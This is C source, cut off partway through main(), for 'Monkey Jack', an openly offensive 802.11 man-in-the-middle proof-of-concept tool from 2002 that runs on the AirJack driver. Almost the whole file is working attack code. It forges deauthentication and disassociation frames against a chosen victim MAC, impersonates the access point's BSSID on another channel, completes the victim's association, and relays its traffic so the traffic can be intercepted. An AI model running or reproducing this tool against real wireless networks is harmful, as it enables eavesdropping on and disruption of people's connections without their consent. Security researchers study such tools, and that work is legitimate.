/******************************************************************************
**
** Monkey Jack: 802.11 layer 1 monkey in the middle attack...
**
**   Author:  Abaddon, abaddon@802.11ninja.net
**
**   Other Development Stuff:  Xx25,  xx25@leper.org
**
**   Copyright (c) 2002 Abaddon, All Rights Reserved (see license info below). 
**
***************
**
**   Theory of Operation: (a little long winded, but no-one's making you read)
**
**
**    Requirements:
**   
**          You're gonna need the AirJack driver package to get this to work
**          if you dont see aj0 when you type ifconfig -a, then its not gonna
**          work...these drivers only work on Linux, and then only on 2.4.x
**          kernels, and I have no plans to port this driver to any other 
**          platforms (sorry BSD guys, I just have no free time)...
**
**    Build Instructions:
**          
**          With the AirJack package: make monkey_jack
**          Without the package     : gcc -O2 monkey_jack.c -o monkey_jack
**
**
**    Notes:
**          At the time of my writing this note, this code is horrible spagetti 
**          code, its nasty, karmicly wrong on so many levels, and just all 
**          around bad, the only thing it does well is that it works...so while
**          it may be spaggetti code, at least it has a good sauce...
**          My hope is that i will have enough time to clean this code up, 
**          should this not be the case i will do so after BlackHat and the 
**          will be both available on the BlackHat webpage and 802.11ninja.net
**          but then that only matters if you're a code snob like myself...
**
**
********************
**
** Legal:
**
**   This program is free software; you can redistribute it and/or
**   modify it under the terms of the GNU General Public License
**   as published by the Free Software Foundation; either version 2
**   of the License, or (at your option) any later version.
**
**   This program is distributed in the hope that it will be useful,
**   but WITHOUT ANY WARRANTY; without even the implied warranty of
**   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
**   GNU General Public License for more details.
**
**   You should have received a copy of the GNU General Public License
**   along with this program; if not, write to the Free Software
**   Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
**
***************
**
** $Id$
**
******************************************************************************/
#define __MONKEY_JACK_C__
#include <sys/types.h>
#include <asm/types.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <features.h>    /* for the glibc version number */
#include <netinet/in.h>
#include <netpacket/packet.h>
#include <sys/resource.h>
#include <net/ethernet.h>     /* the L2 protocols */
#include <syslog.h>
#include <ctype.h>
#include <limits.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>

#include "80211.h"
#include "wireless.h"
#include "../airjack.h"


#pragma pack(1)

/*** Globals ***/

int		real_channel;				/* channel the bss is on (real channel) */
int		fake_channel;				/* channel our fake bss is one and the victim soon will be as well */
char	client_ifname[IFNAMSIZ];	/* name of the interface on the real network */
char	server_ifname[IFNAMSIZ];	/* name of the interface on the real network */
int		client_sockfd;				/* listen and send socket for the real network */
int		server_sockfd;				/* listen and send socket for the real network */
__u8	bssid[6];					/* bssid of the real AP our victim is one */
__u8	victim[6];					/* victims mac address */
__u8	server[6];					/* server's mac address */
__u32	netmask;
__u32	broadcast;
char    essid[33];					/* victims essid, first byte is length */
__u8	frame_buf[4096];			/* capture_buffer */
size_t	frame_len;					/* length of the frame we just captured */
int		disassoc_count;
int		deauth_count;

/***************/

#define MAX(a, b)	(a > b ? a : b)



/*
 * a safe (portable) implimentation of signal()...
 */
static void safe_signal (int signum, void (*handler)(int))
{ 
    struct sigaction	sa;

    memset(&sa, 0, sizeof(struct sigaction));
    sa.sa_handler = handler;

#ifdef SA_RESTART
    sa.sa_flags |= SA_RESTART;
#endif
#ifdef SA_INTERRUPT
    sa.sa_flags &= ~ SA_INTERRUPT;
#endif
sigaction_again:
    if(sigaction(signum, &sa, NULL) < 0) {
        if(errno == EINTR) 
            goto sigaction_again;
        fprintf(stderr, "error while setting up timeout signal handler.\n");
        exit(1);
    }
}


/*
 * brings the specified interface up...
 */
void set_ifup (char *ifname)
{
    struct sockaddr_ll	addr;
    struct ifreq		req;
    int					sockfd;


    /* open the link layer socket */
    if((sockfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        perror("socket");
        exit(1);
    }

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    if(ioctl(sockfd, SIOCGIFINDEX, &req) < 0) {
        perror("ioctl: SIOCGIFINDEX");
        exit(1);
    }

    /* bind the socket to the interface */
    memset(&addr, 0, sizeof(struct sockaddr_ll));
    addr.sll_ifindex = req.ifr_ifindex;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_family = AF_PACKET;
    if(bind(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_ll)) < 0) {
        perror("bind");
        exit(1);
    }

    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    /* bring the interface up */
    if(ioctl(sockfd, SIOCGIFFLAGS, &req) < 0) {
        perror("ioctl: SIOCGIFFLAGS");
        exit(1);
    }

    if(!(req.ifr_flags & IFF_UP)) {
        req.ifr_flags = req.ifr_flags;
        req.ifr_flags |= IFF_UP;

        if(ioctl(sockfd, SIOCSIFFLAGS, &req) < 0) {
            perror("ioctl: SIOCSIFFLAGS");
            exit(1);
        }

        /* give the card a bit of time to enable interrupts and such */
        sleep(1);
    }

    close(sockfd);
}


/*
 * brings the specified interface up...
 */
void set_ifdown (char *ifname)
{
    struct sockaddr_ll	addr;
    struct ifreq		req;
    int					sockfd;


    /* open the link layer socket */
    if((sockfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        perror("socket");
        exit(1);
    }

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    if(ioctl(sockfd, SIOCGIFINDEX, &req) < 0) {
        perror("ioctl: SIOCGIFINDEX");
        exit(1);
    }

    /* bind the socket to the interface */
    memset(&addr, 0, sizeof(struct sockaddr_ll));
    addr.sll_ifindex = req.ifr_ifindex;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_family = AF_PACKET;
    if(bind(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_ll)) < 0) {
        perror("bind");
        exit(1);
    }

    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    /* bring the interface up */
    if(ioctl(sockfd, SIOCGIFFLAGS, &req) < 0) {
        perror("ioctl: SIOCGIFFLAGS");
        exit(1);
    }

    if(req.ifr_flags & IFF_UP) {
        req.ifr_flags = req.ifr_flags;
        req.ifr_flags &= ~IFF_UP;

        if(ioctl(sockfd, SIOCSIFFLAGS, &req) < 0) {
            perror("ioctl: SIOCSIFFLAGS");
            exit(1);
        }

        /* give the card a bit of time to disable interrupts and such */
        sleep(1);
    }

    close(sockfd);
}


/*
 * brings the interface down, changes the mac address, brings the interface 
 * back up again...
 */
static void change_mac (char *ifname, __u8 *mac)
{
    struct sockaddr_ll	addr;
    struct ifreq		req;
    int					sockfd;


    /* open the link layer socket */
    if((sockfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        perror("socket");
        exit(1);
    }

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    if(ioctl(sockfd, SIOCGIFINDEX, &req) < 0) {
        perror("ioctl: SIOCGIFINDEX");
        exit(1);
    }

    /* bind the socket to the interface */
    memset(&addr, 0, sizeof(struct sockaddr_ll));
    addr.sll_ifindex = req.ifr_ifindex;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_family = AF_PACKET;
    if(bind(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_ll)) < 0) {
        perror("bind");
        exit(1);
    }

    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    req.ifr_hwaddr.sa_family = ARPHRD_ETHER;
    memcpy(req.ifr_hwaddr.sa_data, mac, 6);

    if(ioctl(sockfd, SIOCSIFHWADDR, &req) < 0) {
        perror("ioctl: SIOCSIFHWADDR");
        exit(1);
    }

    close(sockfd);
}


/*
 * sets the essid on the lucent card...
 */
static void set_essid (int fd, char *ifname, char *essid)
{
    struct iwreq	req;


    memset(&req, 0, sizeof(struct iwreq));

    strcpy(req.ifr_name, ifname);

    req.u.essid.pointer = essid + 1;
    req.u.essid.length = strlen(essid + 1);
    req.u.essid.flags = 1;

    if(ioctl(fd, SIOCSIWESSID, &req) < 0) {
        perror("ioctl: SIOCSIWESSID");
        exit(1);
    }
}


/*
 * translates the silly frequency thing to a channel number...
 */
static __inline__ int freq_to_channel (struct iw_freq *freq)
{
    const long channel_frequency[] = {
        2412, 2417, 2422, 2427, 2432, 2437, 2442,
        2447, 2452, 2457, 2462, 2467, 2472, 2484
    };
    int i, mult = 1;


    for(i = 0; i < (6 - freq->e); i++) {
        mult *= 10;
    }

    for(i = 0; i < 14; i++) {
        if (freq->m == (channel_frequency[i] * mult)) {
            return(i+1);
        }
    }

    return(-1);
}


/*
 * returns the current channel we are operating on...
 */
static int get_channel (int fd, char *ifname)
{
    struct iwreq	req;


    memset(&req, 0, sizeof(struct iwreq));

    strcpy(req.ifr_name, ifname);

    if(ioctl(fd, SIOCGIWFREQ, &req) < 0) {
        perror("ioctl: SIOCSIWESSID");
        exit(1);
    }

    return(freq_to_channel(&req.u.freq));
}


/*
 * sets the essid on the lucent card, waits a few usec's, checks the channel
 * we're on, then if we're not on the correct channel, we do it all again...
 */
static void force_assoc (void)
{

    do {
        set_essid(server_sockfd, server_ifname, essid);
        /* give the card a few usecs to get associated... */
        sleep(1);
    } while(get_channel(server_sockfd, server_ifname) != real_channel);
    set_ifup(server_ifname);
}


/*
 * stuff...
 */
static int get_socket (char *ifname)
{
    struct sockaddr_ll	addr;
    struct ifreq		req;
    int					sockfd;


    /* open the link layer socket */
    if((sockfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        return(-1);
    }

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    if(ioctl(sockfd, SIOCGIFINDEX, &req) < 0) {
        return(-2);
    }

    /* bind the socket to the interface */
    memset(&addr, 0, sizeof(struct sockaddr_ll));
    addr.sll_ifindex = req.ifr_ifindex;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_family = AF_PACKET;
    if(bind(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_ll)) < 0) {
        return(-3);
    }

    return(sockfd);
}


/*
 * sets up the raw link layer socket for Aironet type cards...
 * returns a filedescriptor on success, -1 on error, errno is set
 */
static int aj_get_socket (char *ifname, struct aj_config *aj_conf)
{
    struct sockaddr_ll	addr;
    struct ifreq		req;
    int					sockfd, flags;


    /* open the link layer socket */
    if((sockfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        return(-1);
    }

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, ifname);

    if(ioctl(sockfd, SIOCGIFINDEX, &req) < 0) {
        return(-2);
    }

    /* bind the socket to the interface */
    memset(&addr, 0, sizeof(struct sockaddr_ll));
    addr.sll_ifindex = req.ifr_ifindex;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_family = AF_PACKET;
    if(bind(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_ll)) < 0) {
        return(-3);
    }

    if(aj_conf != NULL) {
        req.ifr_data = (char *)aj_conf;

        if(ioctl(sockfd, SIOCAJSMODE, &req) < 0) {
            return(-1);
        }
    }

    /* go non-blocking */
    if((flags = fcntl(sockfd, F_GETFL)) < 0) {
        return(-5);
    }

    if(fcntl(sockfd, F_SETFL, flags|O_NONBLOCK) < 0) {
        return(-6);
    }

    return(sockfd);
}


/*
 * converts all lower case letters in the the string to upper case
 */
static __inline__ void to_upper (char *s)
{
    char	*p;
    char	offset;

    offset = 'A' - 'a';
    for(p=s;*p != '\0';p++) {
        if(islower(*p)) {
            *p += offset;
        }
    }
}


/*
 * converts a string to a mac address...
 * returns 1 on success, -1 on failure...
 * failure indicates poorly formed input...
 */
int string_to_mac (char *string, __u8 *mac_buf)
{
    char			*ptr, *next;
    unsigned long	val;
    int				i;


    to_upper(string);

    ptr = next = string;
    for(i=0;i < 6;i++) {
        if((val = strtoul(next, &ptr, 16)) > 255) {
            errno = EINVAL;
            return(-1);
        }
        mac_buf[i] = (__u8)val;
        if((next == ptr) && (i != 6 - 1)) {
            errno = EINVAL;
            return(-1);
        }
        next = ptr + 1;
    }

    return(1);
}


/*
 * um, its usage...
 */
static void usage (const char *pname)
{
    
    fprintf(stderr, "Monkey Jack: Wireless 802.11(b) MITM proof of concept.\n\n");
    fprintf(stderr, "Usage: %s -b <bssid> -v <victim mac> -C <channel number> [ -c <channel number> ]\n", pname);
    fprintf(stderr, "        [ -i <interface name> ] [ -I <interface name> ] [ -e <essid> ]\n\n");
    fprintf(stderr, "       -a:  number of disassociation frames to send (defaults to 7)\n");
    fprintf(stderr, "       -t:  number of deauthentication frames to send (defaults to 0)\n");
    fprintf(stderr, "       -b:  bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)\n");
    fprintf(stderr, "       -v:  victim mac address.\n");
    fprintf(stderr, "       -c:  channel number (1-14) that the access point is on, defaults to current.\n");
    fprintf(stderr, "       -C:  channel number (1-14) that we're going to move them to.\n");
    fprintf(stderr, "       -i:  the name of the AirJack interface to use (defaults to aj0).\n");
    fprintf(stderr, "       -I:  the name of the interface to use (defaults to eth1).\n");
    fprintf(stderr, "       -e:  the essid of the AP.\n\n");
    exit(1);
}


/*
 * parses the command line options...
 */
static void parse_opts (int argc, char **argv)
{
	char	opt;
	char	*pname = argv[0];
    __u8	opts_given = 0;		/* bitfield to make sure they enter the right stuff */


#define OPT_BSSID		1
#define OPT_VICTIM		2
#define OPT_CHANNEL1	4
#define OPT_CHANNEL2	8
	

	/* set defaults */
    strcpy(client_ifname, "aj0");
    strcpy(server_ifname, "eth1");
    strcpy(essid + 1, "AirJack");
    essid[0] = 7;
    disassoc_count = 7;
    deauth_count = 0;

	opterr = 0;
	while((opt = getopt(argc, argv, "a:t:i:I:v:b:c:C:n:e:")) > 0) {
		switch(opt) {
        case 'a':
            disassoc_count = atoi(optarg);
            break;
        case 't':
            deauth_count = atoi(optarg);
            break;
        case 'e':
            memset(essid, 0, sizeof(essid));
            if((essid[0] = strlen(optarg)) > 32) {
                usage(pname);
            }
            strcpy(essid + 1, optarg);
            break;
        case 'i':
            if(strlen(optarg) >= IFNAMSIZ) {
                fprintf(stderr, "invalid interface name: too long: '%s'\n", optarg);
                exit(1);
            }
            strncpy(client_ifname, optarg, IFNAMSIZ);
            break;
        case 'I':
            if(strlen(optarg) >= IFNAMSIZ) {
                fprintf(stderr, "invalid interface name: too long: '%s'\n", optarg);
                exit(1);
            }
            strncpy(server_ifname, optarg, IFNAMSIZ);
            break;
        case 'b':
            opts_given |= OPT_BSSID;
            if(string_to_mac(optarg, bssid) < 0) {
                fprintf(stderr, "Improperly formed bssid.\n");
                exit(1);
            }
            break;
        case 'v':
            opts_given |= OPT_VICTIM;
            if(string_to_mac(optarg, victim) < 0) {
                fprintf(stderr, "Improperly formed destination address (victim).\n");
                exit(1);
            }
            break;
        case 'c':
            opts_given |= OPT_CHANNEL1;
            real_channel = atoi(optarg);
            if((real_channel > 14) || (real_channel < 1)) {
                usage(pname);
            }
            break;
        case 'C':
            opts_given |= OPT_CHANNEL2;
            fake_channel = atoi(optarg);
            if((fake_channel > 14) || (fake_channel < 1)) {
                usage(pname);
            }
            break;
        default:
            usage(pname);
            break;
		}
	}

    if(!(opts_given & OPT_BSSID) && !(opts_given & OPT_VICTIM) && !(opts_given & OPT_CHANNEL1) && !(opts_given & OPT_CHANNEL1)) {
        usage(pname);
    }

    if(fake_channel == real_channel) {
        fprintf(stderr, "Its probably not going to work very well if you're moving them to the same channel they're on, but hey, you're the boss.\n");
    }
}


/*
 * sends a disassociate to the given poor bastard, for the given bssid...
 */
void send_deauth (__u8 *bssid, __u8 *dest)
{
    struct {
        struct a3_80211 hdr;
        unsigned short int	reason;
    }__attribute__ ((packed)) frame;


    /* setup the frame */
    memset(&frame, 0, sizeof(frame));
    memcpy(frame.hdr.mh_mac1, dest, sizeof(frame.hdr.mh_mac1));
    memcpy(frame.hdr.mh_mac2, bssid, sizeof(frame.hdr.mh_mac2));
    memcpy(frame.hdr.mh_mac3, bssid, sizeof(frame.hdr.mh_mac3));
    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_DEAUTH;
    frame.reason = 1;	/* disassociated to to lack of ability to handle all current connections */

write_again:
    if(write(client_sockfd, &frame, sizeof(frame)) < 0) {
        if((errno == EWOULDBLOCK) || (errno == EAGAIN)) {
            close(client_sockfd);
            if((client_sockfd  = aj_get_socket(client_ifname, NULL)) < 0) {
                perror("aj_get_socket");
                exit(1);
            }
            goto write_again;
        } else if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_disassoc");
        exit(1);
    }
}


/*
 * sends a disassociate to the given poor bastard, for the given bssid...
 */
void send_disassoc (__u8 *bssid, __u8 *dest)
{
    struct {
        struct a3_80211 hdr;
        unsigned short int	reason;
    }__attribute__ ((packed)) frame;


    /* setup the frame */
    memset(&frame, 0, sizeof(frame));
    memcpy(frame.hdr.mh_mac1, dest, sizeof(frame.hdr.mh_mac1));
    memcpy(frame.hdr.mh_mac2, bssid, sizeof(frame.hdr.mh_mac2));
    memcpy(frame.hdr.mh_mac3, bssid, sizeof(frame.hdr.mh_mac3));
    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_DISAS;
    frame.reason = 5;	/* disassociated to to lack of ability to handle all current connections */

write_again:
    if(write(client_sockfd, &frame, sizeof(frame)) < 0) {
        if((errno == EWOULDBLOCK) || (errno == EAGAIN)) {
            close(client_sockfd);
            if((client_sockfd  = aj_get_socket(client_ifname, NULL)) < 0) {
                perror("aj_get_socket");
                exit(1);
            }
            goto write_again;
        } else if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_disassoc");
        exit(1);
    }
}


/*
 * cleans up and exit whenever ctrl-c is hit...
 */
void clean_exit (signum)
{

    close(client_sockfd);
    close(server_sockfd);
    printf("\n");
    exit(0);
}


/*
 * prints out a mac address...
 */
void print_mac (__u8 *mac)
{
    printf("%02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
}


/*
 * sends a responce to an open auth request...
 */
void send_open_auth_resp (__u8 *bssid, __u8 *victim)
{
    struct {
        struct a3_80211	hdr;
        __u16			algo;
        __u16			sequence;
        __u16			status;
    } __attribute__ ((packed)) frame;
    

    memset(&frame, 0, sizeof(frame));
    
    memcpy(frame.hdr.mh_mac1, victim, sizeof(frame.hdr.mh_mac1));
    memcpy(frame.hdr.mh_mac2, bssid, sizeof(frame.hdr.mh_mac2));
    memcpy(frame.hdr.mh_mac3, bssid, sizeof(frame.hdr.mh_mac3));

    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_AUTH;
    frame.algo = 0;
    frame.sequence = 2;

write_again:
    if(write(client_sockfd, &frame, sizeof(frame)) < 0) {
        if((errno == EWOULDBLOCK) || (errno == EAGAIN)) {
            close(client_sockfd);
            if((client_sockfd = aj_get_socket(client_ifname, NULL)) < 0) {
                perror("aj_get_socket");
                exit(1);
            }
            goto write_again;
        } else if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_open_auth_resp");
        exit(1);
    }
}


/*
 * sends an association responce frame to the victim...
 */
void send_assoc_resp (__u8 *bssid, __u8 *victim)
{
    struct {
        struct a3_80211		hdr;
        __u16				cap;
        __u16				status;
        __u16				aid;
        struct element_id	rates_id;
        __u8				rates[8];
    } __attribute__ ((packed)) frame;
    

    memset(&frame, 0, sizeof(frame));
    
    memcpy(frame.hdr.mh_mac1, victim, sizeof(frame.hdr.mh_mac1));
    memcpy(frame.hdr.mh_mac2, bssid, sizeof(frame.hdr.mh_mac2));
    memcpy(frame.hdr.mh_mac3, bssid, sizeof(frame.hdr.mh_mac3));

    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_AS_RS;
    frame.status = 0;
    frame.aid = 31337;	

    frame.cap = 1;

    frame.rates_id.e_element_id = ELEM_RATES;
    frame.rates_id.e_length = 6;
    frame.rates[0] = 0x82;
    frame.rates[1] = 0x84;
    frame.rates[2] = 0x8b;
    frame.rates[3] = 0x96;

write_again:
    if(write(client_sockfd, &frame, sizeof(frame)) < 0) {
        if((errno == EWOULDBLOCK) || (errno == EAGAIN)) {
            close(client_sockfd);
            if((client_sockfd = aj_get_socket(client_ifname, NULL)) < 0) {
                perror("aj_get_socket");
                exit(1);
            }
            goto write_again;
        } else if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_assoc_resp");
        exit(1);
    }
}


/*
 * sends a reassociation responce frame to the victim...
 */
void send_reassoc_resp (__u8 *bssid, __u8 *victim)
{
    struct {
        struct a3_80211		hdr;
        __u16				cap;
        __u16				status;
        __u16				aid;
        struct element_id	rates_id;
        __u8				rates[4];
    } __attribute__ ((packed)) frame;
    

    memset(&frame, 0, sizeof(frame));
    
    memcpy(frame.hdr.mh_mac1, victim, sizeof(frame.hdr.mh_mac1));
    memcpy(frame.hdr.mh_mac2, bssid, sizeof(frame.hdr.mh_mac2));
    memcpy(frame.hdr.mh_mac3, bssid, sizeof(frame.hdr.mh_mac3));

    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_REAS_RS;
    frame.status = 0;
    frame.aid = 31337;	

    frame.cap = 1;

    frame.rates_id.e_element_id = ELEM_RATES;
    frame.rates_id.e_length = 6;
    frame.rates[0] = 0x82;
    frame.rates[1] = 0x84;
    frame.rates[2] = 0x8b;
    frame.rates[3] = 0x96;

write_again:
    if(write(client_sockfd, &frame, sizeof(frame)) < 0) {
        if((errno == EWOULDBLOCK) || (errno == EAGAIN)) {
            close(client_sockfd);
            if((client_sockfd = aj_get_socket(client_ifname, NULL)) < 0) {
                perror("aj_get_socket");
                exit(1);
            }
            goto write_again;
        } else if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_reassoc_resp");
        exit(1);
    }
}


/*
 * takes an 802.3 data frame and translates that header into an 802.11 header, then transmits out
 * out to the client...
 */
void send_80211 (struct ether_header *ether_hdr, ssize_t len)
{
    __u8			buf[4096];			/* capture_buffer */
    struct a3_80211	*hdr = (struct a3_80211 *)buf;
    struct llc_hdr	*llc = (struct llc_hdr *)(hdr+1);


    memset(buf, 0, sizeof(buf));

    memcpy(hdr->mh_mac1, ether_hdr->ether_dhost, 6);
    memcpy(hdr->mh_mac2, bssid, 6);
    memcpy(hdr->mh_mac3, ether_hdr->ether_shost, 6);

    if(memcmp(ether_hdr->ether_dhost, victim, 6) && !(ether_hdr->ether_dhost[0] & 0x01)) {
        return;
    }
    memcpy(llc, "\xaa\xaa\x03\x00\x00\x00", 6);
    llc->type = ether_hdr->ether_type;

    hdr->mh_type = FC_TYPE_DATA;
    hdr->mh_subtype = DATA_DATA;
    hdr->mh_from_ds = 1;

    if(len < sizeof(struct ether_header)) {
        return;
    }
    memcpy(llc+1, ether_hdr+1, len - sizeof(struct ether_header));

    len -= sizeof(struct ether_header);
    if(len < 0) {
        return;
    }
    len += sizeof(struct a3_80211) + sizeof(struct llc_hdr);
    
write_again:
    if(write(client_sockfd, buf, len) < 0) {
        if((errno == EWOULDBLOCK) || (errno == EAGAIN)) {
            close(client_sockfd);
            if((client_sockfd = aj_get_socket(client_ifname, NULL)) < 0) {
                perror("aj_get_socket");
                exit(1);
            }
            goto write_again;
        } else if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_80211");
    }
}


/*
 * takes an 802.11 data frame and translates it to an 802.3 frame and sends it out...
 */
void send_8023 (struct a4_80211 *hdr, ssize_t len)
{
    __u8				buf[4096];			/* capture_buffer */
    struct ether_header	*ether_hdr = (struct ether_header *)buf;
    struct llc_hdr		*llc = (struct llc_hdr *)(hdr+1);


    memset(buf, 0, sizeof(buf));

    memcpy(ether_hdr->ether_shost, hdr->mh_mac2, 6);
    memcpy(ether_hdr->ether_dhost, hdr->mh_mac3, 6);
    
    if(memcmp(hdr->mh_mac2, victim, 6)) {
        return;
    }
    ether_hdr->ether_type = llc->type;

    if(len < (sizeof(struct a4_80211) + sizeof(struct llc_hdr))) {
        return;
    }
    memcpy(ether_hdr+1, llc+1, len - sizeof(struct a4_80211) - sizeof(struct llc_hdr));

    len -= sizeof(struct a4_80211);
    len -= sizeof(struct llc_hdr);
    if(len < 0) {
        return;
    }
    len += sizeof(struct ether_header);

write_again:
    if(write(server_sockfd, buf, len) < 0) {
        if(errno == EINTR) {
            goto write_again;
        }
        perror("write: send_8023");
    }
}


/*
 * waits for the probe request to come in from the victim and
 * responds in kind...
 */
void associate (void)
{
    struct a3_80211	*hdr = (struct a3_80211 *)frame_buf;
    ssize_t	nbytes;
    

    do {
        /* wait for an (re)association request */
        do {
            memset(frame_buf, 0, sizeof(frame_buf));
            if((nbytes = read(client_sockfd, frame_buf, sizeof(frame_buf))) < 0) {
                if((errno == EWOULDBLOCK) || (errno == EINTR)) {
                    continue;
                }
                perror("read");
                exit(1);
            }
            frame_len = nbytes;
        } while(memcmp(hdr->mh_mac2, victim, sizeof(victim)));

        if((hdr->mh_type == FC_TYPE_MGT) && !hdr->mh_retry) {
            if(hdr->mh_subtype == MGT_AUTH) {
                send_open_auth_resp(bssid, victim);
            } else if(hdr->mh_subtype == MGT_AS_RQ) {
                send_assoc_resp(bssid, victim);
                break;
            } else if(hdr->mh_subtype == MGT_REAS_RQ) {
                send_reassoc_resp(bssid, victim);
                break;
            }
        }
    } while(1);
    /* there, they should now be associated... */
    return;
}


/* 
 * monkey in the middle...
 */
void monkey_jack (void)
{
    ssize_t			nbytes;
    __u8			buf[4096];
    fd_set			read_set, saved_set;
    int				ret, i = 0;
    struct timeval	tv;


    FD_ZERO(&saved_set);
    FD_SET(client_sockfd, &saved_set);
    FD_SET(server_sockfd, &saved_set);

    while(1) {
        read_set = saved_set;

        /* time we should wait to check if the lucent card wigged out */
        tv.tv_sec = 0;
        tv.tv_usec = 900000;

        memset(buf, 0, sizeof(buf));
        if((ret = select(MAX(client_sockfd, server_sockfd) + 1, &read_set, NULL, NULL, &tv)) < 0) {
            if(errno == EINTR) {
                continue;
            }
            perror("select");
            exit(1);
        } else if((ret == 0) || (!(++i % 15) && (!FD_ISSET(server_sockfd, &read_set)))) {
            /* 
             * periodicly our lucent card gets tired of being so close to our fake access point 
             * while its associated to that one so far away, and it desides it would be a clever
             * idea to try to associate to the fake one, which of course isnt really going to 
             * happen...
             * 
             * so when this happens we have to give it a thump on the head and make sure it knows
             * where it's place is damnit, i mean for gods sake, every other peice of hardware on 
             * this system doesnt do things without fist asking the human if its ok, so just who
             * the hell does this card think it is anyways...
             */
            if(get_channel(server_sockfd, server_ifname) != real_channel) {
                printf("reassociating the stupid lucent card...");
                force_assoc();
                printf("done.\n");
            }
        } 

        
        /* handle the client */
        if(FD_ISSET(client_sockfd, &read_set)) {
            client_read_again:
            if((nbytes = read(client_sockfd, buf, sizeof(buf))) < 0) {
                if(errno == EINTR) {
                    goto client_read_again;
                }
                perror("read");
                exit(1);
            }

            if((((struct a3_80211 *)buf)->mh_type == FC_TYPE_DATA) && (((struct a3_80211 *)buf)->mh_subtype == DATA_DATA) && !((struct a3_80211 *)buf)->mh_retry) {
                send_8023((struct a4_80211 *)buf, nbytes);
            }
        }

        memset(buf, 0, sizeof(buf));

        /* handle the server */
        if(FD_ISSET(server_sockfd, &read_set)) {
            server_read_again:
            if((nbytes = read(server_sockfd, buf, sizeof(buf))) < 0) {
                if(errno == EINTR) {
                    goto server_read_again;
                }
                perror("read");
                exit(1);
            }
            send_80211((struct ether_header *)buf, nbytes);
        }
    }
}


/*
 * uh...stuff...
 */
int main (int argc, char **argv)
{
    struct ifreq		req;
    struct aj_config	aj_conf;
    int					i;
    struct rlimit	limit;

    limit.rlim_cur = RLIM_INFINITY;
    limit.rlim_max = RLIM_INFINITY;
    /* we actualy want to core if it comes to that */
    if(setrlimit(RLIMIT_CORE, &limit) < 0) {	/* INFINITY might be too much... */
        syslog(LOG_ERR, "fatal error: setrlimit: %m");
        /* oh well i guess we'll do without */
    }

    parse_opts(argc, argv);

    printf("Starting Monkey in the Middle Attack:\n\n");
    printf("victim:\t");
    print_mac(victim);
    printf("\n");
    printf("bssid:\t");
    print_mac(bssid);
    printf("\n\n");

    memset(&aj_conf, 0, sizeof(struct aj_config));
    aj_conf.channel = real_channel;
    aj_conf.mode = 6;
    aj_conf.monitor = 0;
    memcpy(aj_conf.ownmac, bssid, 6);
    memcpy(aj_conf.essid, essid, sizeof(essid));

    setbuf(stdout, NULL);
    printf("configuring airjack device...");
    set_ifup(client_ifname);
    set_ifdown(server_ifname);
    set_ifup(server_ifname);
    
    if((client_sockfd = aj_get_socket(client_ifname, &aj_conf)) < 0) {
        perror("aj_get_socket");
        exit(1);
    }
    printf("done.\n");

    safe_signal(SIGINT, clean_exit);

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    strcpy(req.ifr_name, client_ifname);
    memset(&aj_conf, 0, sizeof(struct aj_config));
    aj_conf.channel = fake_channel;
    aj_conf.mode = 6;
    aj_conf.monitor = 0;
    memcpy(aj_conf.ownmac, bssid, 6);
    memcpy(aj_conf.essid, essid, sizeof(essid));
    req.ifr_data = (char *)&aj_conf;

